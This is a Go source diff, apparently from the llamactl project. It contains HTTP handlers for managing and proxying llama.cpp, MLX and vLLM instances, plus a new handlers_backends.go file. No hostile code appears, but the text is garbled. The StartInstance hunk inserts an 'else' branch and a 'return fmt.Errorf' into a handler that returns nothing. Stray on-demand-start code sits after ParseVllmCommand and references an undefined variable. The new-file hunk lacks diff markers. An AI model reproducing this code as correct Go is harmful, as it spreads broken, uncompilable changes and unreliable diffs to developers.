 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(output)
 	}
 }
 // LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/devices [get]
 func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		listCmd := exec.Command("llama-server", "--list-devices")
 		output, err := listCmd.CombinedOutput()
 		if err != nil {
 			http.Error(w, "Failed to list devices: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(output)
 	}
 }
 // ListInstances godoc
 // @Summary List all instances
 // @Description Returns a list of all instances managed by the server
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {array} instance.Process "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instances, err := h.InstanceManager.ListInstances()
 		if err != nil {
 			http.Error(w, "Failed to list instances: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(instances); err != nil {
 			http.Error(w, "Failed to encode instances: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // CreateInstance godoc
 // @Summary Create and start a new instance
 // @Description Creates a new instance with the provided configuration options
 // @Tags instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
 // @Success 201 {object} instance.Process "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [post]
 func (h *Handler) CreateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		var options instance.CreateInstanceOptions
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.CreateInstance(name, &options)
 		if err != nil {
 			http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(http.StatusCreated)
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // GetInstance godoc
 // @Summary Get details of a specific instance
 // @Description Returns the details of a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [get]
 func (h *Handler) GetInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // UpdateInstance godoc
 // @Summary Update an instance's configuration
 // @Description Updates the configuration of a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
 // @Success 200 {object} instance.Process "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [put]
 func (h *Handler) UpdateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		var options instance.CreateInstanceOptions
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.UpdateInstance(name, &options)
 		if err != nil {
 			http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // StartInstance godoc
 // @Summary Start a stopped instance
 // @Description Starts a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/start [post]
 func (h *Handler) StartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.StartInstance(name)
 		if err != nil {
 			// Check if error is due to maximum running instances limit
 			if _, ok := err.(manager.MaxRunningInstancesError); ok {
 				http.Error(w, err.Error(), http.StatusConflict)
 				return
 			}
-
+		} else {
-			http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
+			return fmt.Errorf("cannot start instance, maximum number of instances reached")
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // StopInstance godoc
 // @Summary Stop a running instance
 // @Description Stops a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/stop [post]
 func (h *Handler) StopInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.StopInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // RestartInstance godoc
 // @Summary Restart a running instance
 // @Description Restarts a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/restart [post]
 func (h *Handler) RestartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.RestartInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // DeleteInstance godoc
 // @Summary Delete an instance
 // @Description Stops and removes a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 204 "No Content"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [delete]
 func (h *Handler) DeleteInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		if err := h.InstanceManager.DeleteInstance(name); err != nil {
 			http.Error(w, "Failed to delete instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.WriteHeader(http.StatusNoContent)
 	}
 }
 // GetInstanceLogs godoc
 // @Summary Get logs from a specific instance
 // @Description Returns the logs from a specific instance by name with optional line limit
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Param lines query string false "Number of lines to retrieve (default: all lines)"
 // @Produces text/plain
 // @Success 200 {string} string "Instance logs"
 // @Failure 400 {string} string "Invalid name format or lines parameter"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/logs [get]
 func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		lines := r.URL.Query().Get("lines")
 		if lines == "" {
 			lines = "-1"
 		}
 		num_lines, err := strconv.Atoi(lines)
 		if err != nil {
 			http.Error(w, "Invalid lines parameter: "+err.Error(), http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		logs, err := inst.GetLogs(num_lines)
 		if err != nil {
 			http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write([]byte(logs))
 	}
 }
 // ProxyToInstance godoc
 // @Summary Proxy requests to a specific instance
 // @Description Forwards HTTP requests to the llama-server instance running on a specific port
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 200 "Request successfully proxied to instance"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Failure 503 {string} string "Instance is not running"
 // @Router /instances/{name}/proxy [get]
 // @Router /instances/{name}/proxy [post]
 func (h *Handler) ProxyToInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		if !inst.IsRunning() {
 			http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 			return
 		}
 		// Get the cached proxy for this instance
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
 		prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", name)
 		proxyPath := r.URL.Path[len(prefix):]
 		// Ensure the proxy path starts with "/"
 		if !strings.HasPrefix(proxyPath, "/") {
 			proxyPath = "/" + proxyPath
 		}
 		// Update the last request time for the instance
 		inst.UpdateLastRequestTime()
 		// Modify the request to remove the proxy prefix
 		originalPath := r.URL.Path
 		r.URL.Path = proxyPath
 		// Set forwarded headers
 		r.Header.Set("X-Forwarded-Host", r.Header.Get("Host"))
 		r.Header.Set("X-Forwarded-Proto", "http")
 		// Restore original path for logging purposes
 		defer func() {
 			r.URL.Path = originalPath
 		}()
 		// Forward the request using the cached proxy
 		proxy.ServeHTTP(w, r)
 	}
 }
 // OpenAIListInstances godoc
 // @Summary List instances in OpenAI-compatible format
 // @Description Returns a list of instances in a format compatible with OpenAI API
 // @Tags openai
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/models [get]
 func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instances, err := h.InstanceManager.ListInstances()
 		if err != nil {
 			http.Error(w, "Failed to list instances: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		openaiInstances := make([]OpenAIInstance, len(instances))
 		for i, inst := range instances {
 			openaiInstances[i] = OpenAIInstance{
 				ID:      inst.Name,
 				Object:  "model",
 				Created: inst.Created,
 				OwnedBy: "llamactl",
 			}
 		}
 		openaiResponse := OpenAIListInstancesResponse{
 			Object: "list",
 			Data:   openaiInstances,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(openaiResponse); err != nil {
 			http.Error(w, "Failed to encode instances: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // OpenAIProxy godoc
 // @Summary OpenAI-compatible proxy endpoint
 // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
 // @Tags openai
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Success 200 "OpenAI response"
 // @Failure 400 {string} string "Invalid request body or instance name"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/ [post]
 func (h *Handler) OpenAIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Read the entire body first
 		bodyBytes, err := io.ReadAll(r.Body)
 		if err != nil {
 			http.Error(w, "Failed to read request body", http.StatusBadRequest)
 			return
 		}
 		r.Body.Close()
 		// Parse the body to extract instance name
 		var requestBody map[string]any
 		if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		modelName, ok := requestBody["model"].(string)
 		if !ok || modelName == "" {
 			http.Error(w, "Instance name is required", http.StatusBadRequest)
 			return
 		}
 		// Route to the appropriate inst based on instance name
 		inst, err := h.InstanceManager.GetInstance(modelName)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		if !inst.IsRunning() {
 			allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
 			if !allowOnDemand {
 				http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 				return
 			}
 			if h.InstanceManager.IsMaxRunningInstancesReached() {
 				if h.cfg.Instances.EnableLRUEviction {
 					err := h.InstanceManager.EvictLRUInstance()
 					if err != nil {
 						http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
 						return
 					}
 				} else {
 					http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
 					return
 				}
 			}
 			// If on-demand start is enabled, start the instance
 			if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
 				http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
 				return
 			}
 			// Wait for the instance to become healthy before proceeding
 			if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
 				http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
 				return
 			}
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Update last request time for the instance
 		inst.UpdateLastRequestTime()
 		// Recreate the request body from the bytes we read
 		r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
 		r.ContentLength = int64(len(bodyBytes))
 		proxy.ServeHTTP(w, r)
 	}
 }
 // ParseCommandRequest represents the request body for command parsing
 type ParseCommandRequest struct {
 	Command string `json:"command"`
 }
 // ParseLlamaCommand godoc
 // @Summary Parse llama-server command
 // @Description Parses a llama-server command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Failure 500 {object} map[string]string "Internal Server Error"
 // @Router /backends/llama-cpp/parse-command [post]
 func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
 	type errorResponse struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	writeError := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var req ParseCommandRequest
 		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		if strings.TrimSpace(req.Command) == "" {
 			writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
 		}
 		options := &instance.CreateInstanceOptions{
 			BackendType:        backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: llamaOptions,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(options); err != nil {
 			writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
 		}
 	}
 }
 // ParseMlxCommand godoc
 // @Summary Parse mlx_lm.server command
 // @Description Parses MLX-LM server command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /backends/mlx/parse-command [post]
 func (h *Handler) ParseMlxCommand() http.HandlerFunc {
 	type errorResponse struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	writeError := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var req ParseCommandRequest
 		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		if strings.TrimSpace(req.Command) == "" {
 			writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		mlxOptions, err := mlx.ParseMlxCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
 		}
 		// Currently only support mlx_lm backend type
 		backendType := backends.BackendTypeMlxLm
 		options := &instance.CreateInstanceOptions{
 			BackendType:      backendType,
 			MlxServerOptions: mlxOptions,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(options); err != nil {
 			writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
 		}
 	}
 }
 // ParseVllmCommand godoc
 // @Summary Parse vllm serve command
 // @Description Parses a vLLM serve command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /backends/vllm/parse-command [post]
 func (h *Handler) ParseVllmCommand() http.HandlerFunc {
 	type errorResponse struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	writeError := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var req ParseCommandRequest
 		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		if strings.TrimSpace(req.Command) == "" {
 			writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		vllmOptions, err := vllm.ParseVllmCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
 		}
 		backendType := backends.BackendTypeVllm
 		options := &instance.CreateInstanceOptions{
 			BackendType:       backendType,
 			VllmServerOptions: vllmOptions,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(options); err != nil {
 			writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
 		}
 	}
 	// If on-demand start is enabled, start the instance
 	if _, err := h.InstanceManager.StartInstance(inst.Name); err != nil {
 		return fmt.Errorf("failed to start instance: %w", err)
 	}
 	// Wait for the instance to become healthy before proceeding
 	if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
 		return fmt.Errorf("instance failed to become healthy: %w", err)
 	}
 	return nil
 }
--- a/pkg/server/handlers_backends.go
+++ b/pkg/server/handlers_backends.go
@@ -0,0 +1,298 @@
 package server
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"net/http"
 	"os/exec"
 	"strings"
 )
 // ParseCommandRequest represents the request body for backend command parsing
 type ParseCommandRequest struct {
 	Command string `json:"command"`
 }
 // validateLlamaCppInstance validates that the instance specified in the request is a llama.cpp instance
 func (h *Handler) validateLlamaCppInstance(r *http.Request) (*instance.Instance, error) {
 	inst, err := h.getInstance(r)
 	if err != nil {
 		return nil, fmt.Errorf("invalid instance: %w", err)
 	}
 	options := inst.GetOptions()
 	if options == nil {
 		return nil, fmt.Errorf("cannot obtain instance's options")
 	}
 	if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
 		return nil, fmt.Errorf("instance is not a llama.cpp server")
 	}
 	return inst, nil
 }
 // stripLlamaCppPrefix removes the llama.cpp proxy prefix from the request URL path
 func (h *Handler) stripLlamaCppPrefix(r *http.Request, instName string) {
 	// Strip the "/llama-cpp/<name>" prefix from the request URL
 	prefix := fmt.Sprintf("/llama-cpp/%s", instName)
 	r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
 }
 // LlamaCppUIProxy godoc
 // @Summary Proxy requests to llama.cpp UI for the instance
 // @Description Proxies requests to the llama.cpp UI for the specified instance
 // @Tags Llama.cpp
 // @Security ApiKeyAuth
 // @Produce html
 // @Param name query string true "Instance Name"
 // @Success 200 {string} string "Proxied HTML response"
 // @Failure 400 {string} string "Invalid instance"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /llama-cpp/{name}/ [get]
 func (h *Handler) LlamaCppUIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		inst, err := h.validateLlamaCppInstance(r)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid instance", err.Error())
 			return
 		}
 		if !inst.IsRemote() && !inst.IsRunning() {
 			writeError(w, http.StatusBadRequest, "instance is not running", "Instance is not running")
 			return
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "failed to get proxy", err.Error())
 			return
 		}
 		if !inst.IsRemote() {
 			h.stripLlamaCppPrefix(r, inst.Name)
 		}
 		proxy.ServeHTTP(w, r)
 	}
 }
 // LlamaCppProxy godoc
 // @Summary Proxy requests to llama.cpp server instance
 // @Description Proxies requests to the specified llama.cpp server instance, starting it on-demand if configured
 // @Tags Llama.cpp
 // @Security ApiKeyAuth
 // @Produce json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} map[string]any "Proxied response"
 // @Failure 400 {string} string "Invalid instance"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /llama-cpp/{name}/props [get]
 // @Router /llama-cpp/{name}/slots [get]
 // @Router /llama-cpp/{name}/apply-template [post]
 // @Router /llama-cpp/{name}/completion [post]
 // @Router /llama-cpp/{name}/detokenize [post]
 // @Router /llama-cpp/{name}/embeddings [post]
 // @Router /llama-cpp/{name}/infill [post]
 // @Router /llama-cpp/{name}/metrics [post]
 // @Router /llama-cpp/{name}/props [post]
 // @Router /llama-cpp/{name}/reranking [post]
 // @Router /llama-cpp/{name}/tokenize [post]
 func (h *Handler) LlamaCppProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		inst, err := h.validateLlamaCppInstance(r)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid instance", err.Error())
 			return
 		}
 		if !inst.IsRemote() && !inst.IsRunning() {
 			err := h.ensureInstanceRunning(inst)
 			if err != nil {
 				writeError(w, http.StatusInternalServerError, "instance start failed", err.Error())
 				return
 			}
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "failed to get proxy", err.Error())
 			return
 		}
 		if !inst.IsRemote() {
 			h.stripLlamaCppPrefix(r, inst.Name)
 		}
 		proxy.ServeHTTP(w, r)
 	}
 }
 // parseHelper parses a backend command and returns the parsed options
 func parseHelper(w http.ResponseWriter, r *http.Request, backend interface {
 	ParseCommand(string) (any, error)
 }) (any, bool) {
 	var req ParseCommandRequest
 	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
 		writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 		return nil, false
 	}
 	if strings.TrimSpace(req.Command) == "" {
 		writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 		return nil, false
 	}
 	// Parse command using the backend's ParseCommand method
 	parsedOptions, err := backend.ParseCommand(req.Command)
 	if err != nil {
 		writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 		return nil, false
 	}
 	return parsedOptions, true
 }
 // ParseLlamaCommand godoc
 // @Summary Parse llama-server command
 // @Description Parses a llama-server command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Failure 500 {object} map[string]string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/parse-command [post]
 func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		parsedOptions, ok := parseHelper(w, r, &backends.LlamaServerOptions{})
 		if !ok {
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:        backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: parsedOptions.(*backends.LlamaServerOptions),
 			},
 		}
 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // ParseMlxCommand godoc
 // @Summary Parse mlx_lm.server command
 // @Description Parses MLX-LM server command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /api/v1/backends/mlx/parse-command [post]
 func (h *Handler) ParseMlxCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		parsedOptions, ok := parseHelper(w, r, &backends.MlxServerOptions{})
 		if !ok {
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:      backends.BackendTypeMlxLm,
 				MlxServerOptions: parsedOptions.(*backends.MlxServerOptions),
 			},
 		}
 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // ParseVllmCommand godoc
 // @Summary Parse vllm serve command
 // @Description Parses a vLLM serve command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /api/v1/backends/vllm/parse-command [post]
 func (h *Handler) ParseVllmCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		parsedOptions, ok := parseHelper(w, r, &backends.VllmServerOptions{})
 		if !ok {
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:       backends.BackendTypeVllm,
 				VllmServerOptions: parsedOptions.(*backends.VllmServerOptions),
 			},
 		}
 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // executeLlamaServerCommand executes a llama-server command with the specified flag and returns the output
 func (h *Handler) executeLlamaServerCommand(flag, errorMsg string) http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		cmd := exec.Command("llama-server", flag)
 		output, err := cmd.CombinedOutput()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "command failed", errorMsg+": "+err.Error())
 			return
 		}
 		writeText(w, http.StatusOK, string(output))
 	}
 }
 // LlamaServerHelpHandler godoc
 // @Summary Get help for llama server
 // @Description Returns the help text for the llama server command
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Help text"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/help [get]
 func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 	return h.executeLlamaServerCommand("--help", "Failed to get help")
 }
